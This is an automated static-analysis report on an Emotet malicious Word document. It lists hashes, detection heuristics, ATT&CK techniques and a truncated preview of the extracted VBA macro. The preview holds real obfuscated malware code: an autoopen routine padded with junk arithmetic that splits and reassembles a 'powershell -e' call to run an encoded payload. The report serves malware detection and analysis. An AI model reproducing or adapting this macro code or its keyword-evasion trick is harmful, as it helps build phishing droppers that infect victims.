Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8c77b90bcec1ccfd…

MALICIOUS

Office (OLE)

196.8 KB Created: 2019-03-13 20:41:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: b1b4386e85a2b3942bce1609246cde42 SHA-1: 5d3c552290442e9f0aee95676631eed253008e71 SHA-256: 8c77b90bcec1ccfdca3f73dcc1835ec0b99a6bc07abdd01a89ad8d8274e92db1
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that uses GetObject to execute code. Heuristics indicate obfuscation techniques and a detection by ClamAV points to the Emotet family. The macro likely attempts to download and execute a second-stage payload, as suggested by the 'Doc.Downloader' classification and the obfuscated API calls.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6894403-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6894403-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39457 bytes
SHA-256: dd41194aa5f4077288c89a700e497d30fc2a07104fa219e4978951226d7d0716
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oB4ZA1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pDx1cA()
   If iAABB4A = OkAAwU Then
RAxAA1 = CVar(mZAAG4w)
mQAcwQA = bBwoCGAA + CInt(pXBQZU) * 85634570 * CBool(110029696) + 473696187 / Round(iAAA_Bc) - GAUBAB + Sqr(222054324) - 867853187 * CByte(540683069)
nDCBAoQ = CInt(HG1k4oG)
End If
   If KwAQxowG = oX_AAZD Then
Gk1DUAC = CVar(SU_11A)
IB1ACkAo = mG44AA_ + CInt(vBXADBX) * 323806196 * CBool(809013985) + 49850415 / Round(BZADQUAX) - a4AXAUQ + Sqr(811770819) - 666774248 * CByte(817220195)
QBCUwGAA = CInt(fGUAcwDD)
End If
   If wG4ZUAU = pDUAAAA Then
r_CZAD = CVar(dwUXcCQo)
mACABAAA = fAoAoU + CInt(WAUQxAB) * 172565119 * CBool(287150274) + 350561176 / Round(jxUZAk) - wUDAwwD + Sqr(942833722) - 339619269 * CByte(962990992)
IAAZUXw = CInt(TCDAUAB)
End If
   If sAAoxD = K1XoQAAD Then
l_wZ1_cD = CVar(mXQAGA)
fkGQGkwk = sAAGAkAB + CInt(HAoAAQA) * 15975504 * CBool(531060489) + 877328831 / Round(lA_AXCQ) - HDAw1U + Sqr(66528832) - 916906444 * CByte(660349447)
LDBQAQAA = CInt(fZ_AAx)
End If
   If uA_AAQ = FUkwAxkk Then
RUAACA = CVar(sBDDAABB)
UAA1AB = fDAxAAo1 + CInt(tckAocAA) * 624049252 * CBool(740707161) + 126712660 / Round(EACAAwA) - vAXwABA_ + Sqr(490533071) - 988227383 * CByte(121387903)
VDAxCDQC = CInt(nUDU_Ak)
End If
   If RAAXcAG = towUBAo Then
SCDUD4wA = CVar(PAkCD4)
uxAw4GZ = K14AAc + CInt(uACAAc) * 550719061 * CBool(102685227) + 686738258 / Round(nCAkA_) - SkAUoXZ + Sqr(15235627) - 143825224 * CByte(426434539)
S4oXQD = CInt(CQkCD1)
End If
End Function
Sub autoopen()
On Error Resume Next
   If Ew1QB4DA = MAAAAUAA Then
aQABAAD = CVar(i4AxAABG)
tCQABZ = t1wAACAD + CInt(l4AZX4X) * 239025156 * CBool(814371340) + 107700611 / Round(NxAooUA) - FZcwA_ + Sqr(271706513) - 949110291 * CByte(464693885)
EwCDXDQ = CInt(fGBGAA)
End If
   If QoA1ooA = vXABxow Then
ZU1XoUAQ = CVar(GAZAC_)
SwDACBA = w_xocAA + CInt(FkcDGkQA) * 961388465 * CBool(211819448) + 425441850 / Round(SA1oxZG) - PUAU1DX + Sqr(140326894) - 204412231 * CByte(64249682)
TA4AQA = CInt(tUDDADQ4)
End If
HA4DUckB (DA4A1ADB + "po" + HA1DkA + "wersh" + DAGQAQ + "ell -e " + z1CBAUX + oCAcDA_A + WxAxkQ + mAQAAAk + fAAUcww + CZGABUZ + LXAUCA)
   If NxAAGU = vXBAcQBA Then
WQAQA_B = CVar(j1cDAQ)
Q1AA1c = VGABXD + CInt(MBUAUU) * 863341590 * CBool(692255187) + 361060324 / Round(iAk4DCAQ) - zAQAwwA + Sqr(136296685) - 751573616 * CByte(904331075)
wBAAGUAA = CInt(AAAU1D)
End If
   If DB4AUDAw = nGcDAAk Then
ZZADADA = CVar(EAoAGDA_)
WAw4A_U = PwXBxA + CInt(RA1QQD) * 794354315 * CBool(153381967) + 854805939 / Round(AAACoA) - OADAAUU + Sqr(426838703) - 606858628 * CByte(911304945)
wCk_UoUA = CInt(WQAUC4A)
End If
End Sub
Function rwU1GBZ_()
   If aXAXxoC = XZk1GGB Then
wABAUA_U = CVar(RAQCAAAA)
lUUACAA1 = a1B1oAc + CInt(vUAXCQAC) * 559030425 * CBool(717670101) + 383986425 / Round(IQwQDAG) - IAAZAc + Sqr(228355177) - 49871985 * CByte(151499445)
TZXUXA = CInt(tUBcxx)
End If
   If Z_AADQU = FDBBAxQk Then
tBXBDXw = CVar(KcA1ZxXw)
GAAACw = kXBxXcX + CInt(P4oDkXA) * 236897631 * CBool(932283284) + 938090515 / Round(iAAAxAA) - L4GAQUU + Sqr(207679541) - 762086332 * CByte(171389276)
Zo4Zxx = CInt(Kx1AAkC)
End If
   If McxDG_4 = ucBAQAA Then
wAAUAA = CVar(dkBAU4)
vUXZDUx = PxAD4UGG + CInt(W4BBkAUA) * 477490932 * CBool(386608422) + 847336800 / Round(FQADkUo) - KAoAxA + Sqr(949147911) - 741588950 * CByte(892681466)
ixQAoDQC = CInt(QAAAwAc)
End If
   If DZGA1AQ = zCUc1ABU Then
TAAABAB = CVar(YoAAxB)
KZAUBAcC = rZGUAA + CInt(jADD1UX_) * 43975110 * CBool(25963438) + 623421220 / Round(Wo1AoAQ) - Rw_UAwU + Sqr(90302746) - 88167287 * CByte(180590265)
tAZkXA = CInt(OcAAGU4)
End If
   If dAD_ACA = QDBAADA_ Then
H4ACxB = CVar(WXcAUoU)
aAADAwQ = VDAQxUo + CInt(uAcD4o_) * 886672414 * CBool(186588826) + 791281279 / Round(wAoAAQAA) - o4G__BA + Sqr(159850927) - 573576171 * CByte(754796977)
ZkGAAXo 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.